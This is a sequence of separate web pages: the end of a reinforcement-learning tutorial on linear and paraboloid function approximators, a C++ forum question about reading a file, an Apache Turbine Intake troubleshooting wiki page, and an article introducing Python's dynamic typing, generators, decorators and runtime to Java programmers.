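        return w + alpha * ((reward - np.dot(x, w)) * x)
    return w + alpha * ((reward + gamma * np.dot(x_t1, w) - np.dot(x, w)) * x)

# Toy problem: one state, feature vector [1.0], terminal reward +1.
w = np.array([0.0])
x = np.array([1.0])
for _ in range(1000):
    w = update(w, x, x, reward=1.0, alpha=0.1, gamma=0.9, done=True)

print(round(float(np.dot(x, w)), 3))  # close to 1.0
```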
Our current definition of the approximator does not take into account an important factor: the translation of the plane. Having only two weights, we can rotate the surface on the xy-plane but we cannot translate it up and down. This problem becomes clear if you think about the cell (0,0) of the gridworld. The input vector of this cell is $\mathbf{x} = (0, 0)$. Given this input, no matter which values we choose for the weights, when we perform the dot product we are going to end up with a utility of zero. From the geometric point of view, the plane can be rotated, but it is constrained to pass through the point (0,0). For example, in the AND-world the constraint in (0,0) is particularly disturbing. The optimisation cannot adjust the utility in (4,4) to 1.0, because it would get a higher error on the other two red cells in (0,4) and (4,0). The best thing to do is to keep the plane flat. A similar reasoning can be applied to the other worlds. Only in the OR-world is it possible to adjust the inclination and satisfy all the constraints. How can we fix this issue? We have to introduce the bias unit. The bias unit can be represented as an additional input which is always equal to 1. Using the bias unit, the input vector becomes $\mathbf{x} = (x_{1}, x_{2}, x_{0})$ with $x_{0} = 1$. At the same time we have to add an additional value to the weight vector $\mathbf{w}$. The additional weight is updated similarly to the others. Using again Wolfram Alpha, you can see the effect of plugging a bias of one into our usual plane equation, and the difference with respect to the same equation with a bias of zero. I ran the script boolean_worlds_linear_td.py again, setting the variable use_bias=True and using the same hyper-parameters as before, obtaining a new plot. The result is much better! The planes are no longer flat, because introducing the bias gave them the possibility to shift up and down. Now the planes can be adjusted to fit all the constraints.
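A tiny sketch of the problem and the fix (the weight values below are made up):

```python
import numpy as np

w = np.array([0.5, 0.5])         # weights without bias (made-up values)
x_origin = np.array([0.0, 0.0])  # feature vector of cell (0, 0)

# Without a bias the utility at the origin is stuck at zero,
# no matter which weights we pick.
print(np.dot(x_origin, w))  # 0.0

# Adding a bias input fixed at 1 (and a matching weight) frees the plane
# to translate up and down.
w_b = np.array([0.5, 0.5, -0.7])        # last entry is the bias weight
x_origin_b = np.array([0.0, 0.0, 1.0])  # bias unit appended to the features
print(np.dot(x_origin_b, w_b))  # -0.7
```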
The script will also print the weight vector and the utilities returned by this approximator:

------AND-world------
w: [ 0.12578254  0.12194905 -0.71257655]
[[-0.21 -0.09  0.03  0.16  0.28]
 [-0.34 -0.21 -0.09  0.03  0.15]
 [-0.46 -0.34 -0.22 -0.1   0.03]
 [-0.59 -0.46 -0.34 -0.22 -0.1 ]
 [-0.71 -0.59 -0.47 -0.35 -0.22]]

------NAND-world------
w: [-0.12242233 -0.12346582  0.71111163]
[[ 0.22  0.1  -0.03 -0.15 -0.27]
 [ 0.34  0.22  0.1  -0.03 -0.15]
 [ 0.47  0.34  0.22  0.1  -0.03]
 [ 0.59  0.47  0.34  0.22  0.09]
 [ 0.71  0.59  0.46  0.34  0.22]]

------OR-world------
w: [ 0.12406486  0.11832163 -0.26037356]
[[ 0.24  0.35  0.47  0.59  0.71]
 [ 0.11  0.23  0.35  0.47  0.59]
 [-0.01  0.11  0.22  0.34  0.46]
 [-0.14 -0.02  0.1   0.22  0.34]
 [-0.26 -0.14 -0.02  0.09  0.21]]

------XOR-world------
w: [ 0.00220366 -0.00094763  0.00044972]
[[ 0.01  0.01  0.01  0.01  0.01]
 [ 0.01  0.01  0.01  0.    0.  ]
 [ 0.    0.    0.    0.    0.  ]
 [ 0.    0.    0.   -0.   -0.  ]
 [ 0.   -0.   -0.   -0.   -0.  ]]

The utility matrix printed on the terminal is obtained by computing the output of the linear approximator for each state of the gridworld. In Numpy the state (0,0) is the element in the top-left corner, which makes the printed matrix hard to read. For this reason the matrix has been vertically flipped, so that its values match the cells of the gridworld. Looking at the utilities we can see that in most of the worlds they are pretty good. For instance, in the AND-world we should have a utility of -1.0 for the state (0,0). The approximator returned a utility of -0.71 (bottom-left element in the matrix). On the other two red cells the values are -0.21 and -0.22, which are not so close to -1.0 but are at least negative. The green cell in state (4,4) has a true utility of 1.0, and the approximator returned 0.28. At this point it should be clear why having a function approximator is a big deal. With the lookup table approach we could represent the utilities of the boolean worlds using a table with 5 rows and 5 columns, for a total of 25 variables to keep in memory.
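The printed utilities can be reproduced directly from the printed weights. A small check using the AND-world weights from the output above, assuming the feature vector is (x, y, 1) with the bias unit last (which is how the numbers line up):

```python
import numpy as np

# Weights printed for the AND-world: [w_x, w_y, w_bias]
w = np.array([0.12578254, 0.12194905, -0.71257655])

def utility(x, y, w):
    # Linear approximator with the bias unit appended as the last feature
    return np.dot(np.array([x, y, 1.0]), w)

print(round(utility(0, 0, w), 2))  # -0.71, the red cell with true utility -1.0
print(round(utility(4, 4, w), 2))  # 0.28, the green cell with true utility +1.0
```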
Now we only need two weights and a bias, for a total of 3 variables. Everything seems fine: we have an approximator which works pretty well and is easy to tune. However, our problems are not finished. If you look at the XOR-world you will notice that the plane is still flat. This problem is much more serious than the previous one, and there is no way to solve it with a plane. No plane can separate the red and green cells of the XOR-world. Try it yourself: adjust the plane to satisfy all the constraints. It is not feasible. The XOR-world is not linearly separable, and with a linear approximator we can only approximate linearly separable functions. The only chance we have to approximate a utility function for the XOR-world is to literally bend the plane, and to do that we have to use a higher-order approximator.

High-order approximators

The linear approximator is the simplest form of approximation. The linear case is appealing not only for its simplicity but also because it is guaranteed to converge. However, there is an important limit implicit in the linear model: it cannot represent complex relationships between features. That is, the linear form does not allow representing interactions between features. Such interactions naturally arise in physical systems. Some features may be informative only when other features are absent. For example, the inverted pendulum's angular position and velocity are tightly connected. A high angular velocity may be either good or bad depending on the position of the pole. If the angle is high, then a high angular velocity means an imminent danger of falling, whereas if the angle is low, a high angular velocity means the pole is righting itself. Solving the XOR problem is very easy once an additional feature is added. Looking at the equation, the new term I added is the product x1*x2. This term introduces a relationship between the two features x1 and x2.
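To see why the product feature helps, here is a minimal check on a 2x2 version of the XOR pattern (the weights are solved by hand for this sketch, not taken from the post): no plane fits the four constraints, but a linear combination over the features (x1, x2, x1*x2, bias) does.

```python
import numpy as np

# 2x2 XOR pattern: equal corners -> -1, opposite corners -> +1
targets = {(0, 0): -1.0, (1, 1): -1.0, (0, 1): 1.0, (1, 0): 1.0}

# Hand-solved weights for features (x1, x2, x1*x2, bias):
# bias = -1, then w1 = w2 = 2 from the green corners, then w3 = -4 from (1,1).
w = np.array([2.0, 2.0, -4.0, -1.0])

for (x1, x2), target in targets.items():
    features = np.array([x1, x2, x1 * x2, 1.0])
    assert np.dot(features, w) == target  # the "bent plane" fits exactly
print("all four XOR constraints satisfied")
```

The same weights written as a plane (drop the x1*x2 term) cannot satisfy all four equations, which is exactly the linear separability argument above.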
Now the surface represented by the equation is no longer a plane but a hyperbolic paraboloid, a saddle-like surface which perfectly adapts to the XOR-world. We do not need to rewrite the update function, because it remains unchanged: we still have a linear combination of features, and the gradient is still equal to the input vector. In the repository you will find another script called xor_paraboloid.py containing an implementation of this new approximator. Running the script with the same parameters used for the linear case, we end up with the following plot, where the paraboloid is represented from four different perspectives. The result obtained at the end of the training shows that the utilities are very good.

w: [ 0.36834857  0.36628493 -0.18575494 -0.73988694]
[[ 0.73  0.36 -0.02 -0.4  -0.77]
 [ 0.37  0.17 -0.02 -0.21 -0.4 ]
 [-0.   -0.01 -0.01 -0.02 -0.02]
 [-0.37 -0.19 -0.01  0.17  0.35]
 [-0.74 -0.37 -0.01  0.36  0.73]]

We should have -1 in the bottom-left and top-right corners; the approximator returned -0.74 and -0.77, which are pretty good estimations. Similar results have been obtained for the positive states in the top-left and bottom-right corners, where the approximator returned 0.73 in both cases, very close to the true utility of 1.0. I suggest running the script with different hyper-parameters (e.g. the learning rate alpha) to see the effects on the final plot and on the utility table. The geometrical intuition is helpful because it gives an immediate picture of the different approximators. We saw that using additional features and more complex functions it is possible to better describe the utility space. High-order approximators may find useful links between features where a pure linear approximator could not. An example of a high-order approximator is the quadratic approximator, which uses a second-order polynomial to model the utility function. It is not easy to choose the right polynomial.
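Coming back to the printed XOR weights, they can be checked by hand as well. Assuming the feature ordering (x, y, x*y, 1) with the bias last (my inference from the output, since it reproduces the corner values), the table's corners fall out directly:

```python
import numpy as np

# Weights printed by xor_paraboloid.py
w = np.array([0.36834857, 0.36628493, -0.18575494, -0.73988694])

def utility(x, y, w):
    # Paraboloid approximator: linear in the features (x, y, x*y, bias)
    return np.dot(np.array([x, y, x * y, 1.0]), w)

print(round(utility(0, 0, w), 2))  # -0.74, red corner
print(round(utility(4, 4, w), 2))  # -0.77, red corner
print(round(utility(4, 0, w), 2))  # 0.73, green corner
```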
A simple approximator like the linear one can miss the relevant relations between features and target, whereas a high-order approximator can fail to generalise to new, unseen states. The optimal balance is achieved through a delicate tradeoff known in machine learning as the bias-variance tradeoff.

Conclusions

In this post I introduced function approximation, and we saw how to build a methodology based on an error measure, an update rule, and a target. This methodology is extremely flexible, and we are going to use it again in future posts. Moreover, I introduced linear methods, which are the simplest approximators. Linear function approximation is limited because it cannot capture important relationships between features. Using a high-order polynomial can often solve the problem, but it is still a limited approach because modelling the relationship between features remains a design choice. In complex physical systems multiple elements interact, and it is difficult to find the right polynomial to describe those relationships. How to solve this problem? We can use non-linear function approximators. In the next post I will introduce neural networks and show how to use them in reinforcement learning.

Index

- [First Post] Markov Decision Process, Bellman Equation, Value iteration and Policy Iteration algorithms.
- [Second Post] Monte Carlo Intuition, Monte Carlo methods, Prediction and Control, Generalised Policy Iteration, Q-function.
- [Third Post] Temporal Differencing intuition, Animal Learning, TD(0), TD(λ) and Eligibility Traces, SARSA, Q-learning.
- [Fourth Post] Neurobiology behind Actor-Critic methods, computational Actor-Critic methods, Actor-only and Critic-only methods.
- [Fifth Post] Evolutionary Algorithms introduction, Genetic Algorithm in Reinforcement Learning, Genetic Algorithms for policy selection.
- [Sixth Post] Reinforcement learning applications, Multi-Armed Bandit, Mountain Car, Inverted Pendulum, Drone landing, Hard problems.
- [Seventh Post] Function approximation, Intuition, Linear approximator, Applications, High-order approximators.

Resources

The complete code for Reinforcement Learning Function Approximation is available in the dissecting-reinforcement-learning official repository on GitHub.

Sutton, R. S., & Barto, A. G. (1998). Reinforcement learning: An introduction (Chapter 8, "Generalization and Function Approximation"). Cambridge: MIT Press. [html]
https://mpatacchiola.github.io/blog/2017/12/11/dissecting-reinforcement-learning-7.html
Hi, I am trying to read a file and then print out information about that file using a function. Here is the code I have so far:

Code:
#include <iostream>
#include <fstream>
#include <string>
using namespace std;

ifstream in;
void NoOfChars();

int main()
{
    string file;
    cout << "Enter the file name you wish to open: " << endl;
    cin >> file;
    cout << "The file you wish to open is: " << file << endl;
    in.open(file);
    if (in.fail())
    {
        cout << "File failed to open" << endl;
    }
    // Then print out the information here
    cout << "Number of Chars: " << NoOfChars(in) << endl;
}

void NoOfChars()
{
    // Function code here
    return chars;
}

My question is: do I have the right idea? Thanks
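The general idea is right, but as posted the code will not compile: NoOfChars is declared to take no arguments and return void, yet it is called with the stream and its result is printed, and pre-C++11 `ifstream::open` needs a C string (`file.c_str()`). A hedged sketch of one way the function might look (counting via `istream::get` is my own suggestion, not from the thread; taking `std::istream&` keeps it testable with string streams too):

```cpp
#include <fstream>
#include <iostream>
#include <sstream>

// Count every character remaining in a stream.
// get() extracts one character at a time and does not skip whitespace.
int NoOfChars(std::istream& in)
{
    int chars = 0;
    char c;
    while (in.get(c))
    {
        ++chars;
    }
    return chars;
}
```

In `main` you would then open the file with `in.open(file.c_str())` (or pass `file` directly on C++11 and later), return early when `in.fail()` is true, and print `NoOfChars(in)` afterwards.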
http://cboard.cprogramming.com/cplusplus-programming/135488-reading-file.html
Navigation trail: TurbineProjectPages - JakartaTurbine2 - JakartaTurbine2Faq - CommonIntakeProblems

Common Intake Problems

Below are common problems and solutions encountered when first using Intake.

- Make sure that you have read the intake service and intake howto completely.
- Also, check the mailing list archives. Intake is one of the most talked about services on the turbine-user list.
- Please note that the version of Intake provided with Turbine 2.3 does a much better job of giving you more specific error messages when a problem occurs. Nevertheless, Intake in 2.2 works very well and saves you lots of time! It is easily worth the time spent learning how to use it.

Q: Intake won't run, and I am using SDK 1.4

A: If you have Turbine running under SDK 1.4, try recompiling the Turbine source with the Java version you are using. Also, fixed in Turbine 2.3.

Q: Why does $intake.MyGroup.mapTo($myobject) not populate the form fields?

A: Assuming you have your group configured and the $intake tool enabled, does your target object (MyObject) implement the org.apache.turbine.om.Retrievable interface? Putting something like the following ought to work:

{{{
public class MyObject extends BaseMyObject implements Retrievable
{
    private String querykey = null;

    public String getQueryKey()
    {
        if (querykey == null)
        {
            setQueryKey(getPrimaryKey().toString());
        }
        return querykey;
    }

    public void setQueryKey(String arg)
    {
        querykey = arg;
    }
}
}}}

You may wonder why your Torque-generated objects don't already do this. This is because Torque is a separate project from Turbine, and it would be improper for Torque-generated objects to implement an interface from the Turbine project. So you must do it manually, and be glad that it is easy to do.
== A Beginner's Experience With Intake ==

Introduction

This will be sort of a work-in-progress section for me; after all the help I have received from the community on the user list, I thought it was only fair to document it on the wiki. So as I get different aspects of my Intake service to work, I will try and post them here. Regards, Stuart Townhill.

My Setup
- TDK 2.2.
- Ant 1.5.1.
- Maven v. 1.0-beta-7.
- MySQL Ver 11.18.
- Win XP Professional Version 2002 Service Pack 1.
- JDK 1.4.1.

Intake Setup

Uncomment the following lines from TurbineResources.properties (<TDK ROOT>/webapps/<APPNAME>/WEB-INF/build):

services.IntakeService.classname=org.apache.turbine.services.intake.TurbineIntakeService (the Intake service)
tool.request.intake=org.apache.turbine.services.intake.IntakeTool (the Intake pull tool used to connect your template with the Intake service)

Problems Encountered

First Problem

At first I could never get Intake to initialise. The answer to this is an elaboration of the first question on this page. Basically, it is my understanding that the turbine2-2.jar (<TDK ROOT>/webapps/<APPNAME>/WEB-INF/lib) was built using JDK 1.3.1 and therefore may not work correctly with JDK 1.4.1.

Solution
- I downloaded the following file () and used Maven to build a new jar file, therefore using the JDK installed on my machine, which solved the problem (but not for long).

Second Problem

As soon as I solved the first problem, it seemed to trigger another one. As soon as I browsed to my app (<APPNAME>/servlet/<APPNAME>) I received an error to the tune of (Horrible Exception: java.lang.NoClassDefFoundError: org/apache/regexp/RESyntaxException).

Solution
- I had to add the following file (regexp-1.2.jar) to my (<TDK ROOT>/webapps/<APPNAME>/WEB-INF/lib). I found this file located in (<TDK ROOT>/server/lib).

Getting My First Instance Of Intake Working

Coming soon!
http://wiki.apache.org/jakarta/JakartaTurbine2Faq/CommonIntakeProblems?highlight=MyGroup
Python for Java People Editor’s Note: Being in a Java channel, most of us know the language very well and have been in its ecosystem for at least a couple of years. This gives us routine and expertise but it also induces a certain amount of tunnel vision. In the series Outside-In Java non-Javaists will give us their perspective of our ecosystem. Table of Contents Philosophically, Python is almost a polar opposite to Java. It forgoes static types and rigid structure in favor of a loose sandbox, within which you’re free to do basically whatever you want. Perhaps Python is about what you can do, whereas Java is about what you may do. And yet both languages still share a great deal of inspiration tracing back to C. They’re both imperative languages with blocks, loops, functions, assignment, and infix math. Both make heavy use of classes, objects, inheritance, and polymorphism. Both feature exceptions fairly prominently. Both handle memory management automatically. They even both compile to bytecode that runs on a VM, though Python compiles transparently for you. Python even took a few cues from Java — the standard library’s logging and unittest modules are inspired by log4j and JUnit, respectively. Given that overlap, I think Java developers ought to feel reasonably at home with Python. And so I come to you bearing some gentle Python propaganda. If you’ll give me a chance, I can show you what makes Python different from Java, and why I find those differences appealing. At the very least, you might find some interesting ideas to take back to the Java ecosystem. (If you want a Python tutorial, the Python documentation has a good one. Also, this is from a Python 3 perspective! Python 2 is still fairly common in the wild, and it has a few syntactic differences.) Syntax Let’s get this out of the way first. Here’s hello world: print("Hello, world!") Hm, well, that’s not very enlightening. Okay, here’s a function to find the ten most common words in a file. 
I’m cheating a little by using the standard library’s Counter type, but it’s just so good.

from collections import Counter

def count_words(path):
    words = Counter()
    with open(path) as f:
        for line in f:
            for word in line.strip().split():
                words[word] += 1

    for word, count in words.most_common(10):
        print(f"{word} x{count}")

Python is delimited by whitespace. People frequently have strong opinions about this. I even thought it was heretical when I first saw it. Now, a decade or so later, it seems so natural that I have a hard time going back to braces. If you’re put off by this, I doubt I can convince you otherwise, but I urge you to overlook it at least for a little while; it really doesn’t cause any serious problems in practice, and it eliminates a decent bit of noise. Plus, Python developers never have to argue about where a { should go. Beyond that aesthetic difference, most of this ought to look familiar. We’ve got some numbers, some assignment, and some method calls. The import statement works a little differently, but it has the same general meaning of “make this thing available”. Python’s for loop is very similar to Java’s for-each loop, only with a bit less punctuation. The function itself is delimited with def instead of a type, but it works how you’d expect: it can be called with arguments and then return a value (though this one doesn’t). Only two things are really unusual here. One is the with block, quite similar to Java 7’s “try-with-resources” — it guarantees the file will be closed at the end of the block, even if an exception is raised within it. The other is the f"..." syntax, a fairly new feature that allows interpolating expressions directly into strings. And that’s it! You’ve already read some Python. At the very least, this isn’t a language from a totally different planet.

Dynamic typing

It’s probably obvious from that example, but Python code doesn’t have a lot of types sprinkled around.
Not on variable declarations, not on argument or return types, not on the layout of an object. Anything can be any type at any time. I haven’t shown a class definition yet, so here’s a trivial one.

class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y

    def magnitude(self):
        return (self.x ** 2 + self.y ** 2) ** 0.5

point = Point(3, 4)
print(point.x)            # 3
print(point.magnitude())  # 5.0

Even the x and y aren’t declared as attributes; they only exist because the constructor created them. Nothing forced me to pass in integers. I could’ve passed in floats, or perhaps Decimals or Fractions. If you’ve only used static languages, this might sound like chaos. Types are warm and cozy and comforting. They guarantee… well, perhaps not that the code actually works (though some would disagree), but something. How can you rely on code when you don’t even know that anything’s the correct type? But wait — Java has no such guarantee either! After all, any object might be null, right? That’s virtually never an object of the correct type. You might think of dynamic typing as a complete surrender to the null problem. If we have to deal with it anyway, we might as well embrace it and make it work for us — by deferring everything to run time. Type errors become normal logic errors, and you deal with them the same way. (For the opposite approach, see Rust, which has no null value — or exceptions. I’d still rather write Python, but I appreciate that Rust’s type system isn’t always quietly lying to me.) In my magnitude method, it doesn’t matter that self.x is an int or a float or any kind of number at all. It only needs to support the ** operator and return something that supports the + operator. (Python supports operator overloading, so this could be potentially anything.) The same applies to normal method calls: any type is acceptable, as long as it works in practice. That means Python has no need for generics; everything already works generically.
No need for interfaces; everything is already polymorphic with everything. No downcasts, no upcasts, no escape hatches in the type system. No running into APIs requiring a List when they could work just as well with any Iterable. A number of common patterns become much easier. You can create wrapper objects and proxies without needing to change consuming code. You can use composition instead of inheritance to extend a third-party type — without needing to do anything special to preserve polymorphism. A flexible API doesn’t require duplicating every class as an interface; everything already acts as an implicit interface.

The dynamic typing philosophy

With static typing, whoever writes some code gets to choose the types, and the compiler checks that they’ll work. With dynamic typing, whoever uses some code gets to choose the types, and the runtime will give it a try. Here’s that opposing philosophy in action: the type system focuses on what you can do, not what you may do. Using dynamic typing this way is sometimes called “duck typing”, in the sense that “if it walks like a duck and it quacks like a duck, it’s a duck.” The idea is that if all you want is something that quacks, then instead of statically enforcing that your code must receive a duck, you take whatever you’re given and ask it to quack. If it does, that’s all you cared about anyway, so it’s just as good as a duck. (If it can’t, you’ll get an AttributeError, but that’s not very punchy.) Do note, too, that Python is still strongly typed. The term is a little fuzzy, but it generally means that values preserve their types at run time. The typical example is that Python won’t let you add a string to a number, whereas a weakly-typed language like JavaScript would silently convert one type to the other, using precedence rules that may not match your expectations. Unlike a lot of dynamic languages, Python errs on the side of catching mistakes early — at run time, anyway.
For example, reading from a variable that doesn’t yet exist will raise an exception, as will reading a nonexistent key from a dict (like a Map). In JavaScript, Lua, and similar languages, you’d silently get a null value in both cases. (Even Java returns null for missing Map keys!) If you want to fall back to a default, dicts have methods for expressing that more explicitly. There’s definitely a tradeoff here, and whether it’s worth it will differ by project and by person. For me, at least, it’s easier to settle on a firm design for a system after I see it in action, but a statically typed language expects a design upfront. Static typing makes it harder to try out a lot of different ideas, harder to play. You do have fewer static guarantees, but in my experience, most type errors are caught right away… because the first thing I do after writing some code is try to run it! Any others should be caught by your tests — which you should be writing in any language, and which Python makes relatively easy.

A hybrid paradigm

Both Python and Java are imperative and object-oriented: they work by executing instructions, and they model everything as objects. In recent releases, Java has been adding some functional features, to much hurrah, I assume. Python also has its fair share of functional features, but… the approach is somewhat different. It offers a few token builtins like map and reduce, but it’s not really designed around the idea of chaining lots of small functions together. Instead, Python mixes in… something else. I don’t know of any common name for the approaches Python takes. I suppose it split the idea of “chaining functions” into two: working with sequences, and making functions themselves more powerful.

Sequences

Sequences and iteration play a significant role in Python. Sequences are arguably the most fundamental data structure, so tools for working with them are very nice to have.
I interpret this as Python’s alternative to functional programming: instead of making it easier to combine a lot of small functions and then apply them to sequences, Python makes it easier to manipulate sequences with imperative code in the first place. Way back at the beginning, I casually dropped in this line:

for word, count in words.most_common(10):

A for loop is familiar enough, but this code iterates over two variables at a time. What’s actually going on is that each element in the list most_common returns is a tuple, a group of values distinguished by order. Tuples can be unpacked by assigning them to a tuple of variable names, which is what’s really happening here. Tuples are commonly used to return multiple values in Python, but they’re occasionally useful in ad-hoc structures as well. In Java, you’d need an entire class and a couple lines of assigning stuff around. Anything that can be iterated over can also be unpacked. Unpacking supports arbitrary nesting, so a, (b, c) = ... does what it looks like. For sequences of unknown length, a *leftovers element can appear anywhere and will soak up as many elements as necessary. Perhaps you really like LISP?

values = [5, 7, 9]
head, *tail = values
print(head)  # 5
print(tail)  # [7, 9]

Python also has syntax for creating lists out of simple expressions — so-called “list comprehensions” — which are much more common than functional approaches like map. Similar syntax exists for creating dicts and sets. Entire loops can be reduced to a single expression that emphasizes what you’re actually interested in.

values = [3, 4, 5]
values2 = [val * 2 for val in values if val != 4]
print(values2)  # [6, 10]

The standard library also contains a number of interesting iterables, combinators, and recipes in the itertools module. Finally, Python has generators for producing lazy sequences with imperative code. A function containing the yield keyword, when called, doesn’t execute immediately; instead it returns a generator object.
When the generator is iterated over, the function runs until it encounters a yield, at which point it pauses; the yielded value becomes the next iterated value.

def odd_numbers():
    n = 1
    while True:
        yield n
        n += 2

for x in odd_numbers():
    print(x)
    if x > 4:
        break

# 1
# 3
# 5

Because generators run lazily, they can produce infinite sequences or be interrupted midway. They can yield a lot of large objects without consuming gobs of memory by having them all live at once. They also work as a general alternative to the “chained” style of functional programming. Instead of combining maps and filters, you can write familiar imperative code.

# This is the pathlib.Path API from the standard library
def iter_child_filenames(dirpath):
    for child in dirpath.iterdir():
        if child.is_file():
            yield child.name

To express a completely arbitrary lazy iterator in Java, you’d need to write an Iterator that manually tracks its state. For all but the simplest cases, that can get pretty hairy. Python has an iteration interface as well, so you can still use this approach, but generators are so easy to use that most custom iteration is written with them. And because generators can pause themselves, they’re useful in a few other contexts. By advancing the generator manually (instead of merely iterating it all at once with a for loop), it’s possible to run a function partway, have it stop at a certain point, and run other code before resuming the function. Python leveraged this to add support for asynchronous I/O (non-blocking networking without threads) purely as a library, though now it has dedicated async and await syntax.

Functions

At a glance, Python functions are pretty familiar. You can call them with arguments. The passing style is exactly the same as in Java — Python has neither references nor implicit copying. Python even has “docstrings”, similar to Javadoc comments, but built into the syntax and readable at run time.

def foo(a, b, c):
    """Print out the arguments.

    Not a very useful function, really."""
    print("I got", a, b, c)

foo(1, 2, 3)
# I got 1 2 3

Java has variadic functions with args... syntax; Python has much the same using *args. (The *leftovers syntax for unpacking was inspired by the function syntax.) But Python has a few more tricks up its sleeve. Any argument can have a default value, making it optional. Any argument can also be given by name — I did this earlier with Point(x=3, y=4). The *args syntax can be used when calling any function, to pass a sequence as though it were individual arguments, and there’s an equivalent **kwargs that accepts or passes named arguments as a dict. An argument can be made “keyword-only”, so it must be passed by name, which is very nice for optional bools. Python does not have function overloading, of course, but most of what you’d use it for can be replaced by duck typing and optional arguments. The stage is now set for one of Python’s most powerful features. In much the same way as dynamic typing lets you transparently replace an object by a wrapper or proxy, *args and **kwargs allow any function to be transparently wrapped.

def log_calls(old_function):
    def new_function(*args, **kwargs):
        print("i'm being called!", args, kwargs)
        return old_function(*args, **kwargs)
    return new_function

@log_calls
def foo(a, b, c=3):
    print(f"a = {a}, b = {b}, c = {c}")

foo(1, b=2)
# i'm being called! (1,) {'b': 2}
# a = 1, b = 2, c = 3

That’s a bit dense, sorry. Don’t worry too much about exactly how it works; the gist is that foo gets replaced by a new_function, which forwards all its arguments along to foo. Neither foo nor the caller need to know that anything is any different. I cannot overstate how powerful this is. It can be used for logging, debugging, managing resources, caching, access control, validation, and more. It works very nicely in tandem with the other metaprogramming features, and in a similar vein, it lets you factor out structure rather than just code.
Objects and the dynamic runtime

A dynamic runtime is a runtime — the stuff behind the scenes that powers core parts of the language — that can be played with at run time. Languages like C or C++ very much do not have dynamic runtimes; the structure of the source code is “baked” into the compiled output, and there’s no sensible way to change its behavior later on. Java, on the other hand, does have a dynamic runtime! It even comes with a whole package devoted to reflection. Python has reflection too, of course. There are a number of simple functions built right in for inspecting or modifying objects’ attributes on the fly, which is incredibly useful for debugging and the occasional shenanigans. But Python takes this a little bit further. Since everything is done at run time anyway, Python exposes a number of extension points for customizing its semantics. You can’t change the syntax, so code will still look like Python, but you can often factor out structure — something that’s very difficult to do in a more rigid language. For an extreme example, have a look at pytest, which does very clever things with Python’s assert statement. Normally, writing assert x == 1 would simply throw an AssertionError when false, leaving you with no context for what went wrong or where. That’s why Python’s built-in unittest module — like JUnit and many other testing facilities — provides a pile of specific utility functions like assertEquals. Unfortunately, these make tests somewhat wordier and harder to read at a glance. But with pytest, assert x == 1 is fine. If it fails, pytest will tell you what x is… or where two lists diverge, or what elements are different between two sets, or whathaveyou. All of this happens automatically, based on the comparison being done and the types of the operands. How does pytest work? You really don’t want to know. And you don’t have to know to write tests with pytest — and have a blast doing it. That’s the real advantage of a dynamic runtime.
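The built-in reflection functions mentioned above look like this (getattr, setattr, and hasattr are real built-ins; the Config class is a made-up example):

```python
class Config:
    debug = False

cfg = Config()

print(hasattr(cfg, "debug"))          # True
print(getattr(cfg, "debug"))          # False
setattr(cfg, "debug", True)           # same as writing cfg.debug = True
print(cfg.debug)                      # True
print(getattr(cfg, "verbose", None))  # None -- default for a missing attribute
```

Note that the attribute names are ordinary strings, so they can be computed at run time, which is what makes this handy for debugging tools and shenanigans alike.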
You, personally, may not make use of these features. But you can reap great benefits from libraries that use them without caring about how they work. Even Python itself implements a number of extra features using its own extension points — no changes required to the syntax or interpreter.

Objects

My favorite simple example is attribute access. In Java, a Point class might opt for getX() and setX() methods instead of a plain x attribute. The reasoning is that if you ever need to change how x is read or written, you can do so without breaking the interface. In Python, you don’t need to worry about that upfront, because you can intercept attribute access if necessary.

class Point:
    def __init__(self, x, y):
        self._x = x
        self._y = y

    @property
    def x(self):
        return self._x

    # ... same for y ...

point = Point(3, 4)
print(point.x)  # 3

The funny @property syntax is a decorator, which looks like a Java annotation, but can more directly modify a function or class. Reading point.x now calls a function and evaluates to its return value. This is completely transparent to calling code — and indistinguishable from any other attribute read — but the object can intervene and handle it however it likes. Unlike Java, attribute access is part of a class’s API and freely customizable. (Note that this example also makes x read-only, because I didn’t specify how to write to it! The syntax for a writable property is a little funny-looking, and how it works doesn’t matter here. But you could trivially, say, enforce that only odd numbers can be assigned to point.x.) Similar features exist in other static languages like C#, so perhaps this isn’t so impressive. The really interesting part about Python is that property isn’t special at all. It’s a normal built-in type, one that could be written in less than a screenful of pure Python. It works because a Python class can customize its own attribute access, both generally and per-attribute.
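Customizing attribute access "generally" is how transparent wrappers work. A sketch (the LoggingProxy class is my own invention, not from the article): by intercepting lookups with __getattr__, a wrapper can forward everything to an underlying object with no interface declaration at all.

```python
class LoggingProxy:
    """Wrap any object and log attribute access before forwarding it."""
    def __init__(self, wrapped):
        self._wrapped = wrapped

    def __getattr__(self, name):
        # Called only when normal lookup fails, i.e. for wrapped attributes
        print(f"accessing {name!r}")
        return getattr(self._wrapped, name)

words = LoggingProxy(["duck", "goose"])
print(words.count("duck"))
# accessing 'count'
# 1
```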
Wrappers and proxies and composition are easy to implement: you can forward all method calls along to the underlying object without having to know what methods it has. The same hooks property uses could be used for a lazy-loading attribute or an attribute that automatically holds a weak reference — completely transparent to calling code, and all from pure Python.

You’ve probably noticed by now that my code has no public or private modifiers, and indeed, Python has no such concepts. By convention, a single leading underscore is used to mean “private-ish” — or perhaps more accurately, “not intended as part of a stable public API”. But this has no semantic meaning, and Python itself doesn’t stop anyone from inspecting or changing such an attribute (or calling it, if it’s a method). No final or static or const, either. This is that same philosophy at work: core Python isn’t usually in the business of preventing you from doing anything.

And when you need it, it’s very useful. I’ve patched around bugs in third-party libraries by calling or overriding or even outright redefining private methods at startup time. It saves me from having to create a whole local fork of the project, and once the bug is fixed upstream, I simply delete my patch code.

In a similar vein, you can easily write tests for code that depends on external state — say, the current time. If refactoring is impractical, you could replace time.time() with a dummy function for the duration of the test. Library functions are just attributes of modules (like Java packages), and Python modules are objects like anything else, so they can be inspected and modified in the same ways.

Classes

A Java class is backed by a Class object, but the two aren’t quite interchangeable. For a class Foo, the class object is Foo.class. I don’t think Foo can be used usefully on its own, because it names a type, and Java makes some subtle distinctions between types and values.
In Python, a class is an object, an instance of type (which is itself an object, and thus an instance of itself, which is fun to think about). Classes can thus be treated like any other value: passed as arguments, stored in larger structures, inspected, or manipulated. The ability to make dicts whose keys are classes is especially useful at times. And because classes are instantiated simply by calling them — Python has no new keyword — they can be interchanged with simple functions in many cases. Some common patterns like factories are so simple that they almost vanish.

```python
# Wait, is Vehicle a class or a factory function?  Who cares!
# It could even be changed from one to the other without breaking this code.
car = Vehicle(wheels=4, doors=4)
```

